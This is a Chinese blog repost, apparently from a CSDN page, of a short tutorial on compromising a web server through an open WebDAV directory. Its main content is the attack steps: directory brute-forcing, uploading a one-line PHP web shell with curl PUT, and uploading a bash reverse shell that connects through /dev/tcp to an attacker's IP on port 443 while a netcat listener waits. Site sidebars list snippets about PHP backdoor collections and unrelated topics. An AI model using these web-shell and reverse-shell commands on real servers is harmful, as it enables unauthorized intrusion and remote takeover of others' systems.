PHP Backdoor + Reverse Shell on Vulnerable Website

最新推荐文章于 2024-05-12 09:44:10 发布
最新推荐文章于 2024-05-12 09:44:10 发布
阅读量330 收藏
点赞数
文章标签: php shell
原文链接:http://www.cnblogs.com/ssooking/p/6360298.html
版权

翻译总结自:

https://shellgam3.com/2016/07/27/php-backdoor-reverse-shell-on-vulnerable-website/

扫描Web服务器,爆破常见目录

dirb http://xxxxxxxx

proxychains curl -X OPTIONS -v http://X.X.X.X/test/

上面的请求应该是 WebDAV 服务器. 使用 “PUT” 方法可以上传文件

比如一句话:<?php echo system($_GET[“cmd”]); ?>

上传文件:

proxychains curl --upload-file /root/Desktop/cmd.php -v --url http://X.X.X.X/test/cmd.php -0 --http1.0

 

浏览器访问:X.X.X.X/test/cmd.php?cmd=ls%20/

 

上传一个反弹shell

exec 5<>/dev/tcp/xxx.xxx.xxx.xxx/443
cat <&5 | while read line; do $line 2>&5 >&5; done

proxychains curl  --upload-file /root/Desktop/bash_shell.sh -v --url http://X.X.X.X/test/shell.sh -0 --http1.0

本机监听端口,比如netcat:sudo nc -v -l -p 443

浏览器访问:X.X.X.X/test/cmd.php?cmd=bash shell.sh

 

转载于:https://www.cnblogs.com/ssooking/p/6360298.html

abg49988
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php backdoor
11-28
php backdoor, very good to use
shell-backdoor:我创建了此脚本是为了帮助您更轻松地直接攻击网站上的index.php
04-05
如何使用shell后门 查找容易受到黑客攻击的目标网站。 在获得目标网站之后,我们进行了后门种植 植入后门后,我们在浏览器网址中拨打电话 例如,您可以在下面看到 壳后门indosec壮举penucuri
Vue.js:Select--Option >下拉框绑定和取值
热门推荐
杨的博客
08-07 6万+
遇到了这个解决了,所以记录一下: 1.Vue.js 2.https://www.iviewui.com/components/select   完成vue.js下拉框选择绑定与取值,实现效果图如下:     template代码   &lt;template&gt; &lt;div&gt; &lt;Form :model="formItem" r...
探索安全边界:PHP后门库
最新发布
gitblog_00035的博客
05-12 399
探索安全边界:PHP后门库 项目地址:https://gitcode.com/bartblaze/PHP-backdoors 在这个数字时代,了解并防御网络攻击是至关重要的任务。为了教育和测试目的,我们向您推荐一个独特的开源项目——PHP-backdoors。该项目是一个收集各种PHP后门的资源库,提供了一个无害化的环境来研究这些隐蔽的威胁。 项目介绍 PHP-backdoors 是一个由 bar...
php 后门程序解析
weixin_34367257的博客
09-28 207
2019独角兽企业重金招聘Python工程师标准>>> ...
随记(五):一个简单又较隐蔽的PHP后门
XXR_Beta的博客
12-05 557
话不多说,直接上代码(backdoor.php) <?php function adminer($url, $isi) { $fp = fopen($isi, "w"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_BINARYTRANSFER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_seto
php云仅用于,PHP-backdoors 一个PHP后门的集合,仅用于学习或测试目的
weixin_31861055的博客
03-13 118
PHP-backdoorsA collection of PHP backdoors. For educational and/or testing purposes only.NotesThe deobfuscated folder does not necessarily contain deobfuscated versions of the backdoors you can find i...
基于PHP的Mysql BackDoor PHP+Mysql服务器 后门.zip
07-22
标题中的“基于PHP的Mysql BackDoor PHP+Mysql服务器后门”暗示了这是一个关于利用PHP和MySQL数据库创建后门的教程或工具包。在这个场景中,“BackDoor”指的是非法或者非授权的通道,允许攻击者远程控制或访问...
PHP实例开发源码—Mysql BackDoor PHP+Mysql服务器 后门.zip
11-22
【标题】"PHP实例开发源码—Mysql BackDoor PHP+Mysql服务器 后门.zip"涉及的关键知识点主要集中在PHP编程语言以及与MySQL数据库交互的安全问题。在这个压缩包中,我们可能找到了一个PHP后门(BackDoor)的实例,它...
Shells_shell_backdoor_ShellChecker_
10-02
BHH Shell Checker VULNERABILITY OF SITES
icmpdoor:用Python 3和Scapy编写的ICMP Reverse Shell(backdoorrev shell
05-07
icmpdoor是用Python3和scapy编写的ICMP rev shell。 已在Ubuntu 20.04,Debian 10(Kali Linux)和Windows 10上进行测试。 Python版本用法(Windows和Linux): ./icmp-cnc.py -i INTERFACE -d VICTIM-IP (Command...
PHP后门:PHP后门的集合。 仅用于教育或测试目的
02-05
PHP后门 PHP后门的集合。 仅用于教育和/或测试目的。 笔记 不一定包含您可以在反找到的后门的反混淆的版本。 要对这些技巧和其他技巧进行模糊处理,请查看“ 部分。 始终在安全的环境中调查恶意软件。 这意味着:与您的网络分开并在虚拟机中! 某些后门可能是后门的(是的,确实) 。 永远不要将其用于任何恶意目的。 后门遵循以下格式: Backdoorname_SHA1.php ,后门的名称是已知的。 PHP工具 这包括指向以下工具的链接: 反混淆器(在线和离线) 美化工具(在线和离线) 测试人员(运行代码-在安全的环境中执行此操作!) 直接从访问这些工具的链接。 其他回购 这是一个
php_backdoor.php
06-11
大马文件
WebShell:Webshel​​l &&后门集合
02-05
WebShell的 这是一个Webshel​​l开源项目 类别 ar Ascx 阿什克斯 阿斯玛克斯 天冬氨酸 Aspx C Cfm Cgi Java脚本 Jsp px 执照 MySQL的 Nginx的 其他 p l 自述文件 SSH协议 肥皂 乌德普 微信 狗狗 icmp 罐 节点js 开火 操作系统 pwnginx Python reGeorg-master Ruby 小服务程序 SH 战争 XML文件 xssshell 作者:小乐天
php sha265,php后门收集项目 PHP-backdoors
weixin_35511255的博客
04-14 776
php后门收集项目 PHP-backdoors 是一个php后门收集项目,可以作为webshell查杀样本或者学习目的 仅供教育/渗透测试用 建议在虚拟机中进行测试项目地址/下载地址:github后门遵循的格式: Backdoorname_SHA1.php1n73ctionShell_15d337a54e42ed3f2f13d91a85297ab8ee158345.phpAlucarShell_...
网络攻防|Web后门知识详解
weixin_42282189的博客
10-26 5587
作者: h0we777 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x00 简介 web后门泛指webshell,其实就是一段网页代码,包括ASP. ASP.NET. PHP. JSP. 代码等。由于这些代码都运行在服务器端,攻击者通过这段精心设计的代码,在服务器端进行一些危险的操作获得某些敏感的技术信息,或者通过渗透操作提权,从而获得服务器的控制权。这也是攻击者控制服务器的一个方法,比一般的入侵更具隐蔽性。 0x01 Webshell是什么 1.1 Shell(计算机壳.
php后门拿下当前目录
aici0819的博客
03-26 375
Weevely是一个模拟类似telnet的连接的隐形PHP网页shell。它是Web应用程序后期开发的必备工具,可以作为隐形后门程序,也可以作为一个web外壳来管理合法的Web帐户,甚至可以免费托管。 weevely是一款针对PHP的webshell的自由软件,可用于模拟一个类似于telnet的连接shell,weevely通常用于web程序的漏洞利用,隐藏后门或者使用类似tel...
Linux系统的PHP-Webshell后门实验
A0000FF的博客
04-02 882
中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理!在非简体中文环境下使用,自动切换到英文界面。UINCODE方式编译,支持多国语言输入显示。
backdoorphp.webshell.ad后门病毒怎么办?
小戴站长_一个关于互联网知识的博客
03-29 4473
近日在备份数据的时候,杀毒软件火绒突然爆此文件有病毒backdoorphp.webshell.ad后门病毒,病毒信息为当时在想,又没有做什么怎么会有病毒?后来发现,原来是数据库被写入病毒导致的。只能去搜索哪个表被写入病毒。挨个去查找,只不过需要费点时间罢了。 ...
UVM_BACKDOOR是什么
12-05
根据提供的引用内容,没有直接回答UVM_BACKDOOR是什么的信息。但是,可以根据引用内容提供一些相关信息。 引用中提到了uvm_bitstream_t,这是UVM中的一种数据类型,用于在UVM组件之间传递数据。而UVM_BACKDOOR是UVM中的一种机制,可以在不破坏封装性的情况下,访问UVM组件中的内部数据。因此,可以将UVM_BACKDOOR看作是一种使用uvm_bitstream_t数据类型在UVM组件之间传递数据的方法。 另外,引用中提到了uvm_config_db可以传递不同类型的参数,但是并没有提到UVM_BACKDOOR。 综上所述,UVM_BACKDOOR是一种使用uvm_bitstream_t数据类型在UVM组件之间传递数据的方法,可以在不破坏封装性的情况下,访问UVM组件中的内部数据。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值